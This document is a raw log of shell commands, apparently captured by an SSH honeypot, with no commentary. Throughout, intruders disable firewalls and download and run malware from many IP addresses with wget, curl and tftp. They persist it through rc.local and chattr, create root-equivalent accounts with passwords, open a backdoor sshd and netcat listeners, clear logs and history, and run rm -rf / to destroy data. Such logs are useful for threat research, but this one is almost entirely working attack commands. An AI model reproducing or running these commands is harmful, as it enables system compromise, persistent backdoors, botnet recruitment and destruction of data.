id
useradd -G root hades
unmeae -r
uname -r
exit
id
useradd -G root hades
echo "WinSCP: this is end-of-file:0"
service iptables stop
/etc/init.d/iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -O /tmp/Temp http://222.186.129.219:1975/Temp
nohup /tmp/Temp &gt; /dev/null 9&gt;&amp;1 &amp;
chmod 777 Temp
./Temp
chmod 0755 /tmp/Temp
nohup /tmp/Temp &amp;gt; /dev/null 9&amp;gt;&amp;amp;1 &amp;amp;
chmod 0777 Temp
chmod u+x Temp
./Temp &amp;
chmod u+x Temp
./Temp &amp;
cd /tmp
echo &quot;cd  /tmp/&quot;&gt;&gt;/etc/rc.local
echo &quot;./Temp&amp;&quot;&gt;&gt;/etc/rc.local
echo &quot;/etc/init.d/iptables stop&quot;&gt;&gt;/etc/rc.local
chattr +i Temp
chattr +i /tmp/Temp
uname
free -m
ps x
uname
free -m
ps x
uname
free -m
ps x
curl -o /tmp/udp http://23.234.25.140:15826/udp
/tmp/udp
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
cd /tmp
wget -c http://115.230.126.87:1268/0407.25535
chmod 0777 0407.25535
./0407.25535
echo "cd /tmp/">>/etc/rc.local
echo "./0407.25535&">>/etc/rc.local
echo "/etc/init.d/iptables stop">>/etc/rc.local
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
cd /tmp
wget -c http://115.230.126.87:1268/0407.25535
chmod 0777 0407.25535
./0407.25535
echo "cd /tmp/">>/etc/rc.local
echo "./0407.25535&">>/etc/rc.local
echo "/etc/init.d/iptables stop">>/etc/rc.local
ifcongfig
ifconfig
curl -o /tmp/g251 http://23.234.25.140:15826/g251
clear
ls
perl
ls
perl
clear
service iptables stop
wget http://115.231.218.31:888/333
nohup /root/333 > /dev/null 2>&1 &
wget http://115.231.218.31:888/222
nohup /root/222 > /dev/null 2>&1 &
cd /tmp || cd /var/run || cd /dev/shm || cd /mnt || cd /var; rm -f *; wget http://199.180.134.199/bin.sh; sh bin.sh; rm -rf bin.sh; tftp -r tftp1.sh -g 199.180.134.199; sh tftp1.sh; tftp 199.180.134.199 -c get tftp2.sh; sh tftp2.sh; rm -rf bin.sh tftp1.sh tftp2.sh
;s
ls
pwd
wget http://123.1.169.48/aa
ls
wget http://123.1.169.48/aa
wget http://123.1.169.48/aa
wget http://123.1.169.48/aa
wget http://123.1.169.48
wget http://123.1.169.48/aa
wget http://123.1.169.48/aa
wget http://123.1.169.48/aa
chmod 0755 aa
nohup /root/aa > /dev/null 2>&1 &
ls
nohup /root/aa > /dev/null 2>&1 &
nohup /root/aa > /dev/null 2>&1 &
nohup /root/aa > /dev/null 2>&1 &
cd /tmp; rm -rf gb.sh; wget -q http://23.94.97.5/Sharky/gb.sh; sh gb.sh
cd /tmp; rm -rf gb.sh; wget -q http://23.94.97.5/Sharky/gb.sh; sh gb.sh
cd /tmp; rm -rf gb.sh; wget -q http://23.94.97.5/Sharky/gb.sh; sh gb.sh
echo -e test
`id`
id
echo `id`
echo "hello honeypot, and  the important thing is i want fuck you!"
exit
python
rm /var -rf
ls
ls /
cd /
rm / -rf
ls
rm -rf /
while
rm -rf /
rm -rf /
rm -rf /rm -rf /
rm -rf /
rm -rf /
clear
ls -al
ls -al
cat .bashrc 
wget 123
wget -O- http://sb.com
/etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://219.234.6.206:8080/hadess;chmod 777 hadess;./hades;
service iptables stop
wget http://115.231.218.25:869/333
chmod 0755 /root/333
nohup /root/333 > /dev/null 2>&1 &
cd /tmp || cd /var/run || cd /dev/shm || cd /mnt || cd /var; wget http://154.16.63.90/gb.sh; chmod 777 gb.sh; sh gb.sh; tftp -r tftp.sh -g 154.16.63.90; sh tftp.sh; tftp 154.16.63.90 -c get tftp2.sh; sh tftp2.sh; rm -rf gb.sh tftp.sh tftp2.sh
/etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://222.186.129.248:8080/admin0;chmod 777 admin0;./admin0;
cd /tmp; rm -rf gb.sh; wget -q http://23.94.97.5/Sharky/gb.sh; sh gb.sh
uname -m
uname -r
useradd -o -u 0 -g 0 -M -d /root -s /bin/bash butter
echo "xuelp123"|passwd --stdin butter
echo butter:xuelp123|chpasswd
id -u
curl -o /tmp/g251 http://23.234.25.140:15826/g251
curl -o /tmp/g251 http://23.234.25.140:15826/g251
curl -o /tmp/g251 http://23.234.25.140:15826/g251
cd /tmp || cd /var/run || cd /dev/shm || cd /mnt || cd /var; wget http://208.67.1.5/kek0xbin.sh; chmod 777 kek0xbin.sh; sh kek0xbin.sh; rm -rf kek0xbin.sh; tftp -r kek0xt1.sh -g 208.67.1.5; sh kek0xt1.sh; tftp 208.67.1.5 -c get kek0xt2.sh; sh kek0xt2.sh; rm -rf kek0xbin.sh kek0xt1.sh kek0xt2.sh
cd /tmp || cd /var/run || cd /dev/shm || cd /mnt || cd /var; wget http://208.67.1.5/kek0xbin.sh; chmod 777 kek0xbin.sh; sh kek0xbin.sh; rm -rf kek0xbin.sh; tftp -r kek0xt1.sh -g 208.67.1.5; sh kek0xt1.sh; tftp 208.67.1.5 -c get kek0xt2.sh; sh kek0xt2.sh; rm -rf kek0xbin.sh kek0xt1.sh kek0xt2.sh
id
ls
wpd
wegt http://59.46.12.138:5555/sh
wget http://59.46.12.138:5555/sh
chmod 777 sh
./sh
chmod a+x sh
chmod 0777 sh
./sh
wget http://59.46.12.138:5555/sh
chmod 777 sh
./sh
chmod 777 sh
./sh
exit
ls -al
history
echo -n test
nestat -ano
netstat -n test
w
last
ps -al
cd /tmp
ls -al
nc -lvp 2333
apt-get install nc
nc -lvp 2333
nc -lp 2333
exit
history
nc -l
nc -lvp 2333
echo -n test1234
echo 123
ls -al
cat .ssh
cd .ssh/
ls -al
cat known_hosts 
cd 
ls -al
cd /
ls -al
cd home
ls -al
cd richard/
ls -al
apt-get install socat
socat -h
ls -al
cd ..
cd ..
ls -al
history 
exit
history
yum install nc
apt-get install cowsay
cowsay
s
cat /etc/passwd
mail root
mail
ls /
ls -al /
cat /proc/cpu
cat /proc/cpuinfo
fuck you
ipconfig
ifconfig
ifconfig -al
ls
rm /tmp/ -rf
rm /proc/ -rf
ls /
netstat -tlanp
ps -aux|grep watchdog
cat /etc/passwd
passwd
su richard
adduser
useradd
adduser aaa
vi /etc/passwd
vim
nano
ls -al
cd .ssh/
ls
ls -al
cat known_hosts 
cat known_hosts 
exit
exit
exit
curl -o /tmp/g251 http://23.234.25.140:15826/g251
curl -o /tmp/g251 http://23.234.25.140:15826/g251
curl -o /tmp/g251 http://23.234.25.140:15826/g251
curl -o /tmp/g251 http://23.234.25.140:15826/g251
curl -o /tmp/g251 http://23.234.25.140:15826/g251
curl -o /tmp/g251 http://23.234.25.140:15826/g251
chmod 777 /tmp/g251
/tmp/g251
uname
free -m
ps x
uname
free -m
ps x
uname
free -m
ps x
uname
free -m
ps x
/etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://61.147.98.248:8080/ksmw;chmod 777 ksmw;./ksmw;
/etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://61.147.98.248:8080/ksds;chmod 777 ksds;./ksds;
uname
free -m
ps x
uname
free -m
ps x
uname
free -m
ps x
/etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://45.116.79.140/grlg;chmod 777 grlg;./grlg;
/etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://45.116.79.140/grlj;chmod 777 grlj;./grlj;
service iptables stop
wget http://115.231.218.31:888/333
chmod 0755 /root/333
nohup /root/333 > /dev/null 2>&1 &
wget http://115.231.218.31:888/222
chmod 0755 /root/222
nohup /root/222 > /dev/null 2>&1 &
SuSEfirewall2 stop
reSuSEfirewall2 stop
chmod 0755 /root/24Mm
nohup /root/24Mm> /dev/null 2>&1 &
ln -sf /usr/sbin/sshd /tmp/su;/tmp/su -oPort=1987
service iptables stop
cd /tmp
wget http://mdb7.cn:8081/exp
chmod 0777 /root/exp
nohup /root/exp > /dev/null 2>&1 &
rm -f /var/log/wtmp
rm -rf exp
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://www.mhlsf3322.com:223/mhls
chmod 777 ./mhls
nohup ./mhls > /dev/null 2>&1 &
export HISTFILE=/dev/null
history -c
rm -f /var/log/wtmp
service iptables stop
wget http://61.147.98.248:8080/grlg
chmod 0755 /root/grlg
nohup /root/grlg > /dev/null 2>&1 &
chmod 777 grlg
./grlg
chmod 0755 /root/grlg
nohup /root/grlg &gt; /dev/null 2&gt;&amp;1 &amp;
chmod 0777 grlg
chmod u+x grlg
./grlg &
chmod u+x grlg
./grlg &
cd /tmp
service iptables stop
wget http://61.147.98.248:8080/grlj
chmod 0755 /root/grlj
nohup /root/grlj > /dev/null 2>&1 &
chmod 777 grlj
./164
chmod 0755 /root/grlj
nohup /root/grlj &gt; /dev/null 2&gt;&amp;1 &amp;
chmod 0777 grlj
chmod u+x grlj
./grlj &
chmod u+x dos6cc4
./grlj &
wget http://222.186.56.217:9987/K7
wget http://222.186.56.217:9987/K7
./K7 &
id
echo "WinSCP: this is end-of-file:0"
echo "WinSCP: this is end-of-file:0"
echo "WinSCP: this is end-of-file:0"
echo "WinSCP: this is end-of-file:0"
/etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://45.116.79.140/grlg;chmod 777 grlg;./grlg;
/etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://45.116.79.140/grlj;chmod 777 grlj;./grlj;
/etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://45.116.79.140/grlj;chmod 777 grlj;./grlj;
/etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://113.160.48.41:63/xxoo;chmod 777 xxoo;./xxoo;
/etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;curl -c http://113.160.48.41:63/xxoo;wget http://113.160.48.41:63/xxoo;chmod 777 xxoo;./xxoo;
wget http://123.249.12.12:8000/linux-arm
rm -rf /var/run/sftp.pid;filename="/fuck";($filename) || (filename="/6000.bin";cd /;pwd;path=$filename;rm -f $path* || /dev/null > $path;for list in `echo http://51.255.84.218/ http://110.10.129.201/ `;do (wget -O $filename $list$filename || curl -o $filename $list$filename) && break;done ; if [ -f $path ];then chmod +x $path;$path && echo ExecOK;fi);sleep 3;uname -a;cat /etc/issue;df -h;ps -ef;netstat -anto;echo ExecOK;cat /var/run/sftp.pid && echo InstallOK;cat /var/run/mount.pid && echo InstallOK;cat /var/run/gcc.pid && echo InstallOK
curl -o /tmp/linux http://23.234.25.140:15826/linux
SuSEfirewall2 stop
reSuSEfirewall2 stop
chmod 0755 /root/TSmm
nohup /TSmm> /dev/null 2>&1 &
nohup /TSmm> /dev/null 2>&1 &
SuSEfirewall2 stop
reSuSEfirewall2 stop
chmod 0755 /root/24Mm
nohup /24Mm> /dev/null 2>&1 &
id
wget -O /tmp/zyd.m http://180.97.215.135:8080/zyd.m
/etc/init.d/iptables stop
chmod 0755 /tmp/zyd.m
nohup /root/zyd.m > /dev/null 2>&1 &
nohup /root/zyd.m > /dev/null 2>&1 &
nohup /root/zyd.m > /dev/null 2>&1 &
nohup /root/zyd.m > /dev/null 2>&1 &
nohup /root/zyd.m > /dev/null 2>&1 &
nohup /root/zyd.m > /dev/null 2>&1 &
nohup /root/zyd.m > /dev/null 2>&1 &
nohup /root/zyd.m > /dev/null 2>&1 &
nohup /root/zyd.m > /dev/null 2>&1 &
nohup /root/zyd.m > /dev/null 2>&1 &
nohup /root/zyd.m > /dev/null 2>&1 &
nohup /root/zyd.m > /dev/null 2>&1 &
nohup /root/zyd.m > /dev/null 2>&1 &
nohup /root/zyd.m > /dev/null 2>&1 &
nohup /root/zyd.m > /dev/null 2>&1 &
nohup /root/zyd.m > /dev/null 2>&1 &
nohup /root/zyd.m > /dev/null 2>&1 &
nohup /root/zyd.m > /dev/null 2>&1 &
nohup /root/zyd.m > /dev/null 2>&1 &
nohup /root/zyd.m > /dev/null 2>&1 &
nohup /root/zyd.m > /dev/null 2>&1 &nohup /root/zyd.m > /dev/null 2>&1 &
nohup /root/zyd.m > /dev/null 2>&1 &
nohup /root/zyd.m > /dev/null 2>&1 &
nohup /root/zyd.m > /dev/null 2>&1 &
nohup /root/zyd.m > /dev/null 2>&1 &
nohup /root/zyd.m > /dev/null 2>&1 &
nohup /root/zyd.m > /dev/null 2>&1 &
uname -a
whoami
whoami
/etc/init.d/iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
chmod 0755 /root/zyd.m
nohup /root/zyd.m> /dev/null 2>&1 &
nohup /root/zyd.m> /dev/null 2>&1 &
service iptables stop
wget -O /tmp/zyd.m http://180.97.215.135:8080/zyd.m
reSuSEfirewall2 stop
chmod 0755 /tmp/zyd.m
nohup /tmp/zyd.m > /dev/null 2>&1 &
SuSEfirewall2 stop
reSuSEfirewall2 stop
chmod 0755 /root/txma
nohup /root/txma> /dev/null 2>&1 &
id
/etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -O /tmp/syn1 http://69.12.77.199:92/roo1;chmod 0755 roo1;nohup /tmp/roo1 > /dev/null 2>&1 &;
/etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://69.12.77.199:92/syn1;chmod 777 syn1;./syn1;
/etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://69.12.77.199:92/syn1;chmod 777 syn1;./syn1;
/etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://69.12.77.199:92/roo1;chmod 777 roo1;./roo1;
/etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://69.12.77.199:92/syn1;chmod 777 syn1;./syn1;
/etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://69.12.77.199:92/syn;chmod 777 syn;./syn;
/etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://69.12.77.199:92/roo1;chmod 777 roo1;./roo1;
